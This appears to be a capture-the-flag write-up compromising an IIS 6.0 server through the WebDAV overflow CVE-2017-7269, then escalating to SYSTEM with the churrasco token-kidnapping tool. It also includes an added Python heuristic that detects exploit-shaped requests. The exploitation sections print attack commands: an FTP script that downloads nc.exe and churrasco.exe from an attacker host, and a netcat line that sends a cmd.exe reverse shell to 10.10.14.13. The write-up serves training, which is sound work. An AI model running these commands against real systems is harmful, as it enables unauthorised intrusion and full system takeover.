## Machine Overview

We discovered an IIS 6.0 web server exposing HTTP (port 80). The server is vulnerable to a WebDAV buffer overflow (CVE-2017-7269) that allows remote code execution; we used a public PoC to get a reverse shell as `NT AUTHORITY\NETWORK SERVICE`. The machine had `SeImpersonatePrivilege` enabled, which permits a token-kidnapping style escalation on Windows Server 2003. After transferring a privilege-escalation binary via FTP and running it, we obtained a SYSTEM shell (`NT AUTHORITY\SYSTEM`) and retrieved the user and root flags.
## Enumeration

### Nmap Scan

We begin with a service scan to enumerate open ports:

```bash
nmap -sC -sV -A -Pn -oN nmap.txt 10.10.10.14
# nmap version: 7.93
```

Scan results:

```
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|_  Server Date: Sat, 11 Oct 2025 16:44:03 GMT
|_http-title: Under Construction
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
```
### Web Enumeration

Checking the server header with `curl`:

```bash
$ curl -I http://10.10.10.14
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
```

That confirms we are dealing with Microsoft IIS 6.0.

Navigating to http://10.10.10.14 reveals an "Under Construction" page.
## Vulnerability Analysis

A search for IIS 6.0 WebDAV issues yields CVE-2017-7269, a buffer overflow in the WebDAV extension (in the function `ScStoragePathFromUrl`) that can be triggered with a specially crafted HTTP request. This gives remote code execution on unpatched IIS 6.0 servers. For more information, see the F5 Labs article on CVE-2017-7269.
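As an added defensive example (not part of the original write-up or of the PoC), the following triage heuristic flags the request shape the public exploits for this bug use: a PROPFIND whose `If:` header is far longer than any legitimate lock-token list and carries non-ASCII bytes. The length threshold and the two sample requests are assumptions constructed for illustration.

```python
from dataclasses import dataclass

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH"}   # as listed by the scan above
MAX_IF_HEADER = 256  # assumed ceiling; real If: headers hold a few lock tokens


@dataclass
class Finding:
    method: str
    path: str
    reason: str


def parse_request(raw: bytes):
    """Split a raw HTTP request head into (METHOD, path, {header: value})."""
    lines = raw.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    parts = lines[0].decode("latin-1").split(" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("latin-1")] = value.strip()
    return parts[0].upper(), parts[1], headers


def inspect_request(raw: bytes) -> list:
    """Flag WebDAV requests whose If: header is oversized or non-ASCII."""
    method, path, headers = parse_request(raw)
    if method not in WEBDAV_METHODS:
        return []
    if_header = headers.get("if", b"")
    findings = []
    if len(if_header) > MAX_IF_HEADER:
        findings.append(Finding(method, path,
                        f"If: header is {len(if_header)} bytes (limit {MAX_IF_HEADER})"))
    if any(b > 0x7F for b in if_header):
        findings.append(Finding(method, path, "If: header contains non-ASCII bytes"))
    return findings


# Constructed samples: a normal lock-token PROPFIND and one shaped like PoC traffic.
BENIGN = (b"PROPFIND /docs/ HTTP/1.1\r\nHost: 10.10.10.14\r\nDepth: 1\r\n"
          b"If: <http://10.10.10.14/docs/> (<opaquelocktoken:abc>)\r\n\r\n")
SUSPECT = (b"PROPFIND / HTTP/1.1\r\nHost: 10.10.10.14\r\nContent-Length: 0\r\n"
           b"If: <http://localhost/" + b"a" * 300 + b"\xc3\xa9>\r\n\r\n")
```

`inspect_request(SUSPECT)` returns two findings (oversized and non-ASCII `If:` header) while `inspect_request(BENIGN)` returns none; the same function can be run over requests reassembled from a packet capture or an IIS log that records headers.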
## Exploitation

We used a public PoC exploit that sends a crafted WebDAV request and drops a reverse shell:

```bash
python3 iis6_reverse_shell.py 10.10.10.14 80 <reverse_ip> <reverse_port>
```

Setting up the listener:

```bash
nc -lnvp <reverse_port>
```

Netcat output:

```
$ whoami
nt authority\network service
```

We had a shell as `nt authority\network service`.
## Privilege Escalation

System information:

```
$ systeminfo
# OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
# OS Version: 5.2.3790 Service Pack 2 Build 3790
```

We checked available privileges to guide escalation:

```
whoami /priv
```

Output:

```
SeImpersonatePrivilege   Enabled
SeChangeNotifyPrivilege  Enabled
...
```

`SeImpersonatePrivilege` is enabled, which allows token impersonation attacks (Token Kidnapping) on Windows Server 2003.
### Token Kidnapping

Windows Server 2003 is susceptible to token-kidnapping style escalation if a process holding `SeImpersonatePrivilege` can steal a token from a SYSTEM process. We used the public exploit referenced on Exploit-DB 6705 (commonly packaged as `churrasco.exe` in some repos) to perform the token steal and spawn a SYSTEM shell.
### Transfer of exploit and netcat

SMB was not available from the target (attempts failed with an error message), so we used `ftp` to transfer files.

Create the `ftp.txt` script and run it non-interactively:

```bat
echo open 10.10.14.13 21 > ftp.txt & echo USER anonymous >> ftp.txt & echo anonymous >> ftp.txt & echo bin >> ftp.txt & echo GET nc.exe >> ftp.txt & echo GET churrasco.exe >> ftp.txt & echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
```

Execute the token-kidnapper and spawn a reverse shell:

```bat
churrasco.exe -d "C:\wmpub\nc.exe 10.10.14.13 5555 -e cmd.exe"
```
Thanks to 0xveera for the helpful tip about using FTP to transfer exploits.

Setting up the listener:

```bash
nc -lnvp 5555
```

We received a SYSTEM shell:

```
$ whoami
nt authority\system
```
## User & Root Flags

- User: `C:\Documents and Settings\Harry\Desktop\user.txt`
- Root: `C:\Documents and Settings\Administrator\Desktop\root.txt`